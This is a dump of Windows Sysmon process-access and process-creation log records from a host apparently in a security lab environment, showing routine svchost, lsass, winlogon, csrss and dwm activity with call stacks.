13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.461{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.461{59A5CD1D-93F6-6005-E704-00000000A301}45721312C:\Windows\system32\winlogon.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.472{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-2{59A5CD1D-93F7-6005-C7AE-2B0000000000}0x2baec72SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000009762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.461{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1c030|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.461{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.461{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.446{59A5CD1D-8E46-6005-1600-00000000A301}15442212C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.446{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
